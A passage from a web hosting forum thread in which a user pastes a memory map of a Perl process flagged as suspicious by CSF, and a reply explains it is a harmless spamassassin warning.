    00cbb000-00cbc000 r-xp 00012000 fd:00 26805566 /lib/libpthread-2.5.so
    00cbc000-00cbd000 rwxp 00013000 fd:00 26805566 /lib/libpthread-2.5.so
    00cbd000-00cbf000 rwxp 00cbd000 00:00 0
    00cc1000-00ce6000 r-xp 00000000 fd:00 26805573 /lib/libm-2.5.so
    00ce6000-00ce7000 r-xp 00024000 fd:00 26805573 /lib/libm-2.5.so
    00ce7000-00ce8000 rwxp 00025000 fd:00 26805573 /lib/libm-2.5.so
    00d61000-00d68000 r-xp 00000000 fd:00 26805604 /lib/librt-2.5.so
    00d68000-00d69000 r-xp 00006000 fd:00 26805604 /lib/librt-2.5.so
    00d69000-00d6a000 rwxp 00007000 fd:00 26805604 /lib/librt-2.5.so
    00d6c000-00d7f000 r-xp 00000000 fd:00 26805599 /lib/libnsl-2.5.so
    00d7f000-00d80000 r-xp 00012000 fd:00 26805599 /lib/libnsl-2.5.so
    00d80000-00d81000 rwxp 00013000 fd:00 26805599 /lib/libnsl-2.5.so
    00d81000-00d83000 rwxp 00d81000 00:00 0
    00d85000-00d8e000 r-xp 00000000 fd:00 26805593 /lib/libcrypt-2.5.so
    00d8e000-00d8f000 r-xp 00008000 fd:00 26805593 /lib/libcrypt-2.5.so
    00d8f000-00d90000 rwxp 00009000 fd:00 26805593 /lib/libcrypt-2.5.so
    00d90000-00db7000 rwxp 00d90000 00:00 0
    08048000-08126000 r-xp 00000000 fd:00 59322714 /usr/local/bin/perl
    08126000-0812a000 rwxp 000dd000 fd:00 59322714 /usr/local/bin/perl
    0812a000-0812c000 rwxp 0812a000 00:00 0
    0835f000-0a2cc000 rwxp 0835f000 00:00 0 [heap]
    b76ee000-b77af000 rwxp b76ee000 00:00 0
    b7870000-b7931000 rwxp b7d4c000 00:00 0
    b7931000-b79f2000 rwxp b7931000 00:00 0
    b79f2000-b7ab3000 rwxp b7ea2000 00:00 0
    b7b4b000-b7d4c000 rwxp b7b4b000 00:00 0
    b7df7000-b7ea2000 rwxp b7df7000 00:00 0
    b7f4d000-b7f52000 r-xp 00000000 fd:00 60032680 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/NetAddr/IP/Util/Util.so
    b7f52000-b7f53000 rwxp 00004000 fd:00 60032680 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/NetAddr/IP/Util/Util.so
    b7f53000-b7f58000 r-xp 00000000 fd:00 59908663 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/version/vxs/vxs.so
    b7f58000-b7f59000 rwxp 00004000 fd:00 59908663 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/version/vxs/vxs.so
    b7f59000-b7f63000 r-xp 00000000 fd:00 59871844 /usr/local/lib/perl5/5.8.8/i686-linux/auto/DB_File/DB_File.so
    b7f63000-b7f64000 rwxp 00009000 fd:00 59871844 /usr/local/lib/perl5/5.8.8/i686-linux/auto/DB_File/DB_File.so
    b7f64000-b7f6d000 r-xp 00000000 fd:00 26804490 /lib/libnss_files-2.5.so
    b7f6d000-b7f6e000 r-xp 00008000 fd:00 26804490 /lib/libnss_files-2.5.so
    b7f6e000-b7f6f000 rwxp 00009000 fd:00 26804490 /lib/libnss_files-2.5.so
    b7f71000-b7f74000 r-xp 00000000 fd:00 59906292 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/BSD/Resource/Resource.so
    b7f74000-b7f75000 rwxp 00002000 fd:00 59906292 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/BSD/Resource/Resource.so
    b7f75000-b7f79000 r-xp 00000000 fd:00 60032556 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/Digest/SHA1/SHA1.so
    b7f79000-b7f7a000 rwxp 00003000 fd:00 60032556 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/Digest/SHA1/SHA1.so
    b7f7a000-b7f7d000 r-xp 00000000 fd:00 59871555 /usr/local/lib/perl5/5.8.8/i686-linux/auto/Sys/Syslog/Syslog.so
    b7f7d000-b7f7e000 rwxp 00002000 fd:00 59871555 /usr/local/lib/perl5/5.8.8/i686-linux/auto/Sys/Syslog/Syslog.so
    b7f7e000-b7f83000 r-xp 00000000 fd:00 59871947 /usr/local/lib/perl5/5.8.8/i686-linux/auto/List/Util/Util.so
    b7f83000-b7f84000 rwxp 00004000 fd:00 59871947 /usr/local/lib/perl5/5.8.8/i686-linux/auto/List/Util/Util.so
    b7f84000-b7f86000 r-xp 00000000 fd:00 59872383 /usr/local/lib/perl5/5.8.8/i686-linux/auto/Cwd/Cwd.so
    b7f86000-b7f87000 rwxp 00001000 fd:00 59872383 /usr/local/lib/perl5/5.8.8/i686-linux/auto/Cwd/Cwd.so
    b7f87000-b7f88000 r-xp 00000000 fd:00 60032568 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/Net/DNS/DNS.so
    b7f88000-b7f89000 rwxp 00001000 fd:00 60032568 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/Net/DNS/DNS.so
    b7f89000-b7f92000 r-xp 00000000 fd:00 60031986 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/HTML/Parser/Parser.so
    b7f92000-b7f93000 rwxp 00008000 fd:00 60031986 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/HTML/Parser/Parser.so
    b7f93000-b7f97000 r-xp 00000000 fd:00 59872354 /usr/local/lib/perl5/5.8.8/i686-linux/auto/Time/HiRes/HiRes.so
    b7f97000-b7f98000 rwxp 00003000 fd:00 59872354 /usr/local/lib/perl5/5.8.8/i686-linux/auto/Time/HiRes/HiRes.so
    b7f98000-b7f9b000 r-xp 00000000 fd:00 59871569 /usr/local/lib/perl5/5.8.8/i686-linux/auto/File/Glob/Glob.so
    b7f9b000-b7f9c000 rwxp 00002000 fd:00 59871569 /usr/local/lib/perl5/5.8.8/i686-linux/auto/File/Glob/Glob.so
    b7f9c000-b7f9e000 r-xp 00000000 fd:00 59871799 /usr/local/lib/perl5/5.8.8/i686-linux/auto/MIME/Base64/Base64.so
    b7f9e000-b7f9f000 rwxp 00001000 fd:00 59871799 /usr/local/lib/perl5/5.8.8/i686-linux/auto/MIME/Base64/Base64.so
    b7f9f000-b7fb5000 r-xp 00000000 fd:00 59871742 /usr/local/lib/perl5/5.8.8/i686-linux/auto/POSIX/POSIX.so
    b7fb5000-b7fb6000 rwxp 00015000 fd:00 59871742 /usr/local/lib/perl5/5.8.8/i686-linux/auto/POSIX/POSIX.so
    b7fb6000-b7fb9000 r-xp 00000000 fd:00 59871596 /usr/local/lib/perl5/5.8.8/i686-linux/auto/Fcntl/Fcntl.so
    b7fb9000-b7fba000 rwxp 00002000 fd:00 59871596 /usr/local/lib/perl5/5.8.8/i686-linux/auto/Fcntl/Fcntl.so
    b7fba000-b7fbe000 r-xp 00000000 fd:00 60164505 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/Socket6/Socket6.so
    b7fbe000-b7fbf000 rwxp 00003000 fd:00 60164505 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/Socket6/Socket6.so
    b7fbf000-b7fc2000 rwxp b7fbf000 00:00 0
    b7fc2000-b7fc3000 r-xp 00000000 fd:00 59871558 /usr/local/lib/perl5/5.8.8/i686-linux/auto/Sys/Hostname/Hostname.so
    b7fc3000-b7fc4000 rwxp 00000000 fd:00 59871558 /usr/local/lib/perl5/5.8.8/i686-linux/auto/Sys/Hostname/Hostname.so
    b7fc4000-b7fc7000 r-xp 00000000 fd:00 59872379 /usr/local/lib/perl5/5.8.8/i686-linux/auto/IO/IO.so
    b7fc7000-b7fc8000 rwxp 00002000 fd:00 59872379 /usr/local/lib/perl5/5.8.8/i686-linux/auto/IO/IO.so
    b7fc8000-b7fcc000 r-xp 00000000 fd:00 59871524 /usr/local/lib/perl5/5.8.8/i686-linux/auto/Socket/Socket.so
    b7fcc000-b7fcd000 rwxp 00003000 fd:00 59871524 /usr/local/lib/perl5/5.8.8/i686-linux/auto/Socket/Socket.so
    b7fcd000-b7fce000 r-xp b7fcd000 00:00 0 [vdso]
    bfba5000-bfbd3000 rw-p bffd1000 00:00 0 [stack]

    Guys, any idea what should I do ? I have killed the PID..
    Thank you
    there is no problem with the above process, its just a warning from csf about spamassassin.
    Windows VPS | Linux Hybrid Server | 99.9% Uptime
    http://www.odishahosting.com ( USA DC)
    http://www.odishahosting.in ( INDIA DC)

Similar Threads

  1. why User root is running process httpd all time?
    By papiandy in forum Hosting Security and Technology
    Replies: 17
    Last Post: 07-07-2009, 06:23 AM
  2. Suspicious process 'duy'
    By alphix in forum Hosting Security and Technology
    Replies: 6
    Last Post: 06-29-2009, 07:15 PM
  3. CSF - Suspicious process - wp-cron.php
    By m_abdelfattah in forum Hosting Security and Technology
    Replies: 11
    Last Post: 10-11-2008, 06:04 PM
  4. WHM emails.. Suspicious process running under user XXXX..
    By webuser00 in forum Hosting Security and Technology
    Replies: 2
    Last Post: 08-29-2008, 09:08 PM
  5. £10 ($15) 3 Process Shells (1 1000 User IRCd Process allowed!)
    By a.harris in forum Shared Hosting Offers
    Replies: 0
    Last Post: 03-24-2003, 03:07 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •